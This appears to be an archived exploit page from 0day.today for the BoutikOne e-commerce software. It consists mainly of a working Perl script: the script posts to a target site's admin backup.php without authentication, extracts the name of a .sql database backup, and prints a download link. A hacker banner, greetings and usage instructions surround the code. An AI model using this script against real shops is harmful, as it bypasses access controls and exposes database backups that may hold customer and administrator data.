BoutikOne ByPass & Download Backup Vulnerability

🗓️ 02 Jul 2012 00:00:00Reported by GarAType
zdt🔗 0day.today👁 21 Views
BoutikOne ByPass & Download Backup Vulnerability exploit for www.boutikone.co
#!/usr/bin/perl -w
# Exploit Title: BoutikOne ByPass & Download Backup Vulnerability
# Exploit Author: GarA
# Vendor Homepage: www.boutikone.com
# Tested on: Win Xp sp3
system ("color a");
system ("cls");
$num_args = $#ARGV + 1;
if ($num_args != 2) {
print "            :MM:....:HMMM                   .MMMMMMMMMM.                                             \n";                 
print "   .M    ..                MM.             M.      :MMMMH                            \n";                                   
print "    M M                       MH        .MM           M                        \n"       ;                                  
print "    .M HM                       M:     MMMMMMH                              \n"           ;                                 
print "     HM  MMH                     :M   MMMMMMMMMMMH                            \n"          ;                                
print "    .M  MMMMMMM:                  .     .MMMMMMMMMMM.                         \n"           ;                               
print "   M  MMMM :MMMMMMMMH H            M          MMMMMMMM:                       \n"            ;                              
print "      MMM  . :MMMMMMMM             M              MMMMMM                      \n"             ;                             
print "   M  HMM H MM HMMMMM              M.               MMMMM                    \n"               ;                            
print "  .:   .M  H.:  MMHMM              M                 .MMM                      \n"              ;                           
print "    .   .MM   MM  M:               M                  :MMH    MMMMM   M. HMMM   HMMMM    .M.  .M    MH   \n";              
print "   ..    :MMMM:   .M               .                   MM.  HMH   :.  MMM. .M  MM    MH  .MM  MMM  :M:   \n" ;              
print "     H   :  :MMH                  M                   .MM   MH       .MM    .   MMMM :M.  MM  MHM  MM     \n" ;             
print "      MM   HM:    :             HM                    MM    M        .MH           .MMM:  MM M..M.:M:    \n"   ;            
print "       HM:    .MMM            :M                     MM     MM    :H .MH      MM     MM   .MMM  MMMM     \n"    ;           
print "         MMMMHHMM          :MH                      M        HMMMMH   MH        MMMMM      MM   .MM    \n" ; 
print " \n";
print "\n BoutikOne ByPass & Download Backup Vulnerability \n";
print "\nUsage: $0 site admin-path \n";
print "Example: $0 www.site.com admin \n";
print "=========================================\n";
print " Exploit discovered & coded by GarA \n";
print " Gr33tz to : Dr.Sayr0s , Dr.BiLLi , Last Breath \n";
print " Dr.Milas , O-Snip3r , Ev!l Code , P4L-T3RRORIST \n";
print " Mr NoRvI , Dr.sa3d , Mr MeGa , ViRuS_PaL , \n";
print " Scr3w & Arhack.net ";
  exit;
}


$site=$ARGV[0];
$admn=$ARGV[1];
  use LWP::UserAgent;
  $ua = new LWP::UserAgent;
  $ua->agent("AgentName/0.1 " . $ua->agent);
  my $req = new HTTP::Request POST => 'http://' . $site . '/'. $admn . '/backup.php';
  $req->content_type('application/x-www-form-urlencoded');
  $req->content('action2=go');
  my $res = $ua->request($req);
  if ($res->content =~ /admin.*?\.sql/ )
{
print ("Don3 ~\n");
print ("Download ; \n");
print ( $site . '/',$& ,"\n"); 
print ("3nj0y \n");
}
else 
{
	 print "Faild :S \n";

}



#  0day.today [2018-04-11]  #
02 Jul 2012 00:00Current
7.1High risk
Vulners AI Score7.1